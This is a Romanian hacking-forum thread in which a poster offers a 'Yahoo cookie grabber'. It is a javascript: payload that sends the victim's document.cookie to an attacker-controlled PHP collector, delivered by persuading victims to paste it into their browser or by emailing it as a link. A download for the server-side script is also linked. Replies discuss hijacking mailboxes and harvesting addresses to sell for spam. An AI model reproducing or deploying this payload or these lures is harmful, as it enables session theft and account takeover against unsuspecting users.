Jump to content
Guest expl0iter

Yahoo Cookie Grabber [fara xss]

Recommended Posts

Guest expl0iter

Fara sa folosesti XSS

Daca tot nu este voie cu XSS-uri de yahoo pe rst, am gasit o metoda de a fura cookieuri si fara XSS :))

Acest grabber este pentru cei care nu au XSS, insa au putere maxima de a prosti lumea.

Dai acest cod la victima sa il bage in browser. [Tre sa ai putere de convingere foarte mare]

javascript:document.location='http://site-ul-tau.com/yahoo.php?ex='.concat(escape(document.cookie));  

Victima trebuie sa intre pe yahoo.com apoi sa bage in browser acel cod.

Nu am testat acest cod, dar incercati voi. Trimiteti un mail la un id de mess cu codul urmator:

<a href="javascript:document.location='http://site-ul-tau.com/yahoo.php?ex='.concat(escape(document.cookie));">CLICK</a>

Scriptul e gasit prin pc.

Daca gasiti metode de a baga acel script in browserul cuiva fara accesul persoanei repective, anuntati-ma si pe mine :))) sa nu mor prost :)

Oricum nu prea se pot face multe chestii.

vNjm1.png

http://i.imgur.com/vNjm1.png

Uploadati fisierele si creati un folder: /cookies

Download: Multiupload.com - upload your files to multiple file hosting sites!

Pass:rstcenter.com

Edited by expl0iter
Link to comment
Share on other sites

Guest expl0iter
e faina ideea,poti sa faci cam o singura chestia cu asta,sa aduni emailuri apoi sa le vinzi presupun,daca ai un blog mare asa poti sa vezi clar cine se uita la blogul tau si are yahoo + ca strangi emails

Ce ma? Tu stii ce face un cookie grabber?:|

Ba, nu ia mailurile ci iti da access la mailul respectiv. Loooool:|

Link to comment
Share on other sites

Guest expl0iter
Da koa' da cum pana mea il convingi pe mameluc sa copie codu ala in browser,cat de prost trebuie sa fie victimizatu'.

Asta deja nu este treaba mea... Eu am postat metoda.. Tu cauta o metoda ingenioasa.. inventeaza ceva :|. Incearca cu <a href="COD">xxx</a>. Nu am avut timp sa incerc eu

Link to comment
Share on other sites

  • Moderators
Ce ma? Tu stii ce face un cookie grabber?:|

Ba, nu ia mailurile ci iti da access la mailul respectiv. Loooool:|

Poti pune un iframe cu xss-ul intr-un site cu multe vizite, iti faci o lista cu sute de mail-uri pe care le poti vinde pentru spam. Nu te mai impacienta asa, gandeste inainte sa scrii ceva.

Link to comment
Share on other sites

Guest expl0iter
eu daca trimit mail cu <a href nu-mi pune linkul la textul respectiv, ci imi arata pur si simplu ce am scris. Gresesc cu ceva?

thx expl0iter pt "schema"!

Stiu asta.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...